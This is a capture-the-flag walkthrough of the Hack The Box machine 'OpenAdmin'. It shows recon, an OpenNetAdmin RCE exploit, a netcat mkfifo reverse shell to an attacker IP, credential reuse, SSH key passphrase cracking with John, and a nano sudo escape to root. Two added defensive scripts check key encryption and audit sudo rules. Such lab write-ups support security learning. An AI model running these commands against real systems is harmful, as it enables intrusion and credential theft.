# OpenAdmin

## Nmap

```
sudo nmap 10.10.10.171 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Checking port 80, we find that the root page serves the default Apache 2 install web page.

![http://10.10.10.171/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d47098afe93ab7876a3b658132930c1f49f6885d%2Fimage.png?alt=media)

Running dirsearch.py against the target we find multiple directories:

```
sudo python3 dirsearch.py -u http://10.10.10.171/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --full-url -t 75 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-61132aa9ce1a48ddbfbf2fcd204ff5ca58cd0662%2Fimage.png?alt=media)

I manually looked through the discovered directories that returned web pages. However, I was unable to identify any interesting information contained in these pages.

I then started OWASP ZAP and ran an active spider against the site. ZAP soon picks up the sub-page /ona.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-15d0deb1b8281e9e795e088db7395b22bcb6de42%2Fimage.png?alt=media)

Browsing to /ona:

![http://10.10.10.171/ona/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c677b5f310bd8e63bfb7368f71fbf59b3bdd9b85%2Fimage.png?alt=media)

We see from the header in the tab that this is 'OpenNetAdmin'. From the web page we can see it is running version v18.1.1.

**What is OpenNetAdmin?**

OpenNetAdmin is a system for tracking IP network attributes in a database. A web interface is provided to administer the data, and there is a fully functional CLI interface for batch management (for those of you who prefer NOT to use a GUI). There are also several backend processes for building DHCP, DNS, router configuration, etc.

Checking `searchsploit` for known exploits, we get results for an RCE.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-444816f6783cd5fd68d8fcf0491bb06f14ef5710%2Fimage.png?alt=media)

Further exploit searching shows a reliable Python exploit for OpenNetAdmin:

<https://github.com/amriunix/ona-rce>

Clone the repository:

```
sudo git clone https://github.com/amriunix/ona-rce.git 
```

Then execute the script:

```
python3 ona-rce.py exploit http://10.10.10.171/ona
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-617c5fb7e4bccae01d2717b489439855533f3427%2Fimage.png?alt=media)

Whilst we do have a shell, it is bound to the current directory, so we cannot easily navigate the target system. To resolve this, I first checked which useful software was available on the target system.

```
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5f69a60651abd6a36da18e4e40ff5808588318ef%2Fimage.png?alt=media)

This shows `nc` as being on the target system. I then set a `netcat` listener on my attacking machine on port 443.

```
sudo nc -lvp 443
```

I then executed the following `netcat` reverse shell on the target system:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 443 >/tmp/f
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-03a57b2ed27ac0d626da4f44446cbfffa213b936%2Fimage.png?alt=media)

Now we have a full reverse shell. After some manual enumeration I found some interesting information in `/opt/ona/www/local/config/database_settings.inc.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b4b0dc33563188ee80422eff031107a3fb03d428%2Fimage.png?alt=media)

We have discovered the following MySQL credentials: `ona_sys:n1nj4W4rri0R!`. We can also check these for password reuse. Looking at the home directory, we have two users: jimmy and joanna.

I tried using SSH as jimmy and was given access with the password above.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-289fca1bb7b78f127aa37c9dcd131b9a2f4625f6%2Fimage.png?alt=media)

From here, further enumeration shows a directory named 'internal' that is accessible only to jimmy and members of the internal group.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-32596b5f4e5d3190234543a04394a8a9349ab9d6%2Fimage.png?alt=media)

The directory contains the following files:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f07123bf67e6a293ae889730d1f98812907de1e%2Fimage.png?alt=media)

Checking the contents of main:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c357b9702e4e10e5897ff8c99001a6989a89045e%2Fimage.png?alt=media)

It looks like the PHP file retrieves joanna's SSH key when it is executed. We know this directory is not served on the normal port 80.

Checking `netstat` we see something is running locally on port 52846.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f6d8064b10ffa018c5b1987a76720fbb3dc819f%2Fimage.png?alt=media)

Running curl against the local port and main.php gives us a valid result.

```
curl http://127.0.0.1:52846/main.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b9a2674ec6b726bd837a42aa0cedb7bb9926c176%2Fimage.png?alt=media)

Copy the key to the attacking machine and set correct key permissions:

```
chmod 600 id_rsa
```

As we can see from the line 'Proc-Type: 4,ENCRYPTED', the key is encrypted, so we will need a passphrase to use it when connecting over SSH.

We can use ssh2john.py to generate a hash from this key file, then crack it with John.

```
python2 /usr/share/john/ssh2john.py id_rsa > hash.txt
```

Then crack with `John`.

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f5a0531e2874e5f9aa8b6480ed74e48c03e67acd%2Fimage.png?alt=media)
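A defender's check for the key format seen above, as an added example that is not part of the original writeup: the `Proc-Type: 4,ENCRYPTED` header marks a legacy PEM key, whose encryption key is derived with a single round of MD5 over the passphrase and salt, so wordlist guessing against it is cheap. The sample files are constructed (real headers, placeholder bodies) and the function names are illustrative.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Classify a private key file by how its passphrase protects it.
classify_key() {
    first=$(head -n 1 "$1" 2>/dev/null)
    case "$first" in
    *"BEGIN OPENSSH PRIVATE KEY"*)
        # New format: cipher and KDF names sit at the start of the decoded blob.
        hdr=$(sed '/^-----/d' "$1" | tr -d '\n' | base64 -d 2>/dev/null |
              head -c 48 | tr -c 'a-z0-9-' ' ')
        case "$hdr" in
        *openssh-key-v1*bcrypt*) echo "openssh-bcrypt" ;;
        *openssh-key-v1*none*)   echo "openssh-unencrypted" ;;
        *)                       echo "unreadable" ;;
        esac ;;
    *"BEGIN RSA PRIVATE KEY"*|*"BEGIN DSA PRIVATE KEY"*|*"BEGIN EC PRIVATE KEY"*)
        # Legacy PEM: an encrypted key announces itself in a cleartext header.
        if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
            echo "legacy-pem-encrypted"     # MD5-derived key, cheap to guess
        else
            echo "legacy-pem-unencrypted"   # no passphrase at all
        fi ;;
    *) echo "not-a-key" ;;
    esac
}

# Constructed sample files: real headers, placeholder bodies (no key material).
make_samples() {
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,00000000000000000000000000000000' '' \
        'PLACEHOLDER' '-----END RSA PRIVATE KEY-----' > "$1/legacy_enc"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'PLACEHOLDER' \
        '-----END RSA PRIVATE KEY-----' > "$1/legacy_plain"
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt' | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1/new_enc"
}

dir=$(mktemp -d)
make_samples "$dir"
for f in "$dir"/*; do
    printf '%-14s %s\n' "${f##*/}" "$(classify_key "$f")"
done
rm -rf "$dir"
```

`ssh-keygen -p -o -a 100 -f <keyfile>` rewrites a key in the OpenSSH format with a bcrypt KDF; `-o` is the default from OpenSSH 7.8 onwards.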

We can then use SSH to log in as joanna with the SSH key, entering the passphrase found above with John when prompted.

```
ssh -i id_rsa joanna@10.10.10.171
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9ea686720eb709e87fc5707f711d31476271eaf1%2Fimage.png?alt=media)

Checking `sudo -l` for `sudo` privileges we see that we can run `/bin/nano /opt/priv` as anyone without providing a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f0fb772c22ec8f8a26909e3196b997551e4a6c3%2Fimage.png?alt=media)

Checking nano against [GTFOBins](https://gtfobins.github.io/gtfobins/nano/) we see we can spawn a shell with the nano binary.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3445e7ab3c113c23ab5439db05e0cc37f8766e22%2Fimage.png?alt=media)

To spawn a root shell run the following command:

```
sudo /bin/nano /opt/priv
```

When in a nano editor press the following keys:

```
CTRL+R
CTRL+X
```

Then when prompted paste and execute the following:

```
reset; sh 1>&0 2>&0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3f157f72d03c5c757039911577ccd55f61e4fa2%2Fimage.png?alt=media)
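An audit for the kind of sudo rule used above, as an added example that is not part of the original writeup: it reads `sudo -l` output and flags permitted commands whose program can itself run other commands. The sample rules, the `host` name and the short `RISKY_BINS` list are constructed for illustration; the first rule mirrors the one described for joanna.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Programs with a built-in way to run commands (short illustrative list;
# GTFOBins catalogues many more).
RISKY_BINS="nano pico vi vim view less more man ed emacs"

# Read `sudo -l` output on stdin; print "FLAG <bin> :: <command>" for every
# permitted command whose program is in RISKY_BINS.
audit_sudo_rules() {
    grep -E '^[[:space:]]*\(' |               # rule lines start with "(runas)"
    grep -v 'NOEXEC:' |                        # NOEXEC stops it exec'ing others
    sed -E 's/^[[:space:]]*\([^)]*\)//' |      # drop the runas spec
    tr ',' '\n' |                              # one permitted command per line
    while IFS= read -r cmd; do
        set -f; set -- $cmd; set +f            # split into words, no globbing
        while [ $# -gt 0 ]; do                 # skip tags such as NOPASSWD:
            case "$1" in *:) shift ;; *) break ;; esac
        done
        [ $# -gt 0 ] || continue
        bin=${1##*/}
        case " $RISKY_BINS " in
            *" $bin "*) echo "FLAG $bin :: $*" ;;
        esac
    done
}

# Constructed sample; the first rule is the one the writeup describes.
SAMPLE_RULES='User joanna may run the following commands on host:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) sudoedit /opt/priv
    (root) /usr/bin/systemctl restart apache2, /usr/bin/vim /etc/hosts'

printf '%s\n' "$SAMPLE_RULES" | audit_sudo_rules
```

Replacing such a rule with `sudoedit /opt/priv` lets the user edit the file while the editor itself runs unprivileged, so an editor escape no longer yields a root shell.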


